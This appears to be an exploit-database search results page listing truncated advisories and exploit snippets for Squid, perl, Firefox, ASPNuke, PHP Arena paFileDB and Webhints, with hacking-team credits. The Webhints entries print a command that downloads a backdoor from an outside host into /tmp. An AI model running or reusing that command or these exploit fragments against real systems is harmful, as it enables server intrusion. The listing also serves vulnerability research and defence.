9413 matches found
Squid Set-Cookie Header Cross-session Information Disclosure
The remote Squid caching proxy, according to its banner, is prone to an information disclosure vulnerability. Due to a race condition, Set-Cookie headers may leak to other users if the requested server employs the deprecated Netscape Set-Cookie specifications with regards to how cacheable content...
FreeBSD : perl -- vulnerabilities in PERLIO_DEBUG handling (a5eb760a-753c-11d9-a36f-000a95bc6fae)
Kevin Finisterre discovered bugs in perl's I/O debug support : - The environmental variable PERLIODEBUG is honored even by the set-user-ID perl command usually named sperl or suidperl. As a result, a local attacker may be able to gain elevated privileges. CVE-2005-0155 - A buffer overflow may occ...
Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution
// Exploit by Michael Krax Firewalling - Proof-of-Concept function stopload // in some cases the javascript url never stops to load // therefore we force a stop after the real image got loaded window.setTimeout"window.stop",1000; Firewalling - Proof-of-Concept The "Set As Wallpaper" dialog takes...
Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit
Exploit for unknown platform in category remote exploits ================================================================== Mozilla Firefox Firewalling - Proof-of-Concept function stopload // in some cases the javascript url never stops to load // therefore we force a stop after the real image go...
Mozilla Firefox <= 1.0.4 ""Set As Wallpaper"" Code Execution Exploit
No description provided by source. // Exploit by Michael Krax !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" html head titleFirewalling - Proof-of-Concept/title script function stopload // in some cases the javascript url never stops to load // therefore we force a stop after the...
FreeBSD : kstars -- exploitable set-user-ID application fliccd (0512b761-70fb-40d3-9954-aa4565528fa8)
A KDE Security Advisory explains : Overview KStars includes support for the Instrument Neutral Distributed Interface INDI. The build system of this extra 3rd party software contained an installation hook to install fliccd part of INDI as SUID root application. Erik Sjolund discovered that the cod...
Code execution via "Set as Wallpaper" — Mozilla
If an attacker can convince a victim to use the "Set As Wallpaper" context menu item on a specially crafted image then they can run arbitrary code on the user's computer. The image "source" must be a javascript: url containing an eval statement and such an image would get the "broken image" icon,...
ASPNuke 0.80 - article.asp SQL Injection
ASPNuke 0.80 - article.asp SQL Injection !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: ASPNuke ASP Portal Expl0it By: [email protected] Discovered By: Trap-Set Underground Hacking Team oilKarchacK GR33tz T0 == Alphaprogrammer -- oilKarchack -- theCephale...
ASPNuke <= 0.80 (article.asp) SQL Injection Exploit
Exploit for unknown platform in category web applications =================================================== ASPNuke Alphaprogrammer -- oilKarchack -- theCephaleX -- Str0ke And Iranian Security & Technical Sites: IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team , Crouz Security...
ASPNuke 0.80 - 'article.asp' SQL Injection
!/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: ASPNuke ASP Portal Expl0it By: [email protected] Discovered By: Trap-Set Underground Hacking Team oilKarchacK GR33tz T0 == Alphaprogrammer -- oilKarchack -- theCephaleX -- Str0ke And Iranian Security &...
Unpassworded 'mpi' Account
The account 'mpi' on the remote host does not have a password set. An attacker may use this to gain further privileges on this system. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. account = "mpi"; password = ""; include'deprecatednasllevel.inc'; include'compat.inc'; if description...
PHP Arena <= 1.1.3 pafiledb.php Remote Change Password Exploit
No description provided by source. !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder Expl0it By: A l p h a P r o g r a m m e r Sirus-v Email: [email protected] + Discovered By: GulfTech + Advisory:...
PHP Arena 1.1.3 - pafiledb.php Remote Change Password
PHP Arena 1.1.3 - pafiledb.php Remote Change Password !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder Expl0it By: A l p h a P r o g r a m m e r Sirus-v Email: [email protected] + Discovered By: GulfTech +...
security flaw
Race condition in Squid 2.5.STABLE7 to 2.5.STABLE9, when using the Netscape Set-Cookie recommendations for handling cookies in caches, may cause Set-Cookie headers to be sent to other users, which allows attackers to steal the related cookies...
Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...
Webhints 1.03 - Remote Command Execution (Perl) (1)
This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln Expl0it...
Webhints <= 1.03 Remote Command Execution Exploit (c code) (2)
Exploit for cgi platform in category web applications ============================================================== Webhints mhp0rtal -- oilKarchack -- The-CephaleX -- Str0ke And Iranian Security & Technical Sites: TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG Crouz , Simorgh-ev...
Webhints 1.03 - Remote Command Execution (C) (2)
Webhints 1.03 - Remote Command Execution C 2 / T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln Coded By: A l p h a P r o g r a m m e r Sirus-v E-Mail: [email protected] This Xpl Upload a Page in Vulnerable Directory , You ca...
Webhints 1.03 - Remote Command Execution (C) (2)
/ T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln Coded By: A l p h a P r o g r a m m e r Sirus-v E-Mail: [email protected] This Xpl Upload a Page in Vulnerable Directory , You can Change This Code For Yourself GR33tz T0 ==...
Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
Exploit for cgi platform in category web applications ================================================================= Webhints mhp0rtal -- oilKarchack -- The-CephaleX -- Str0ke...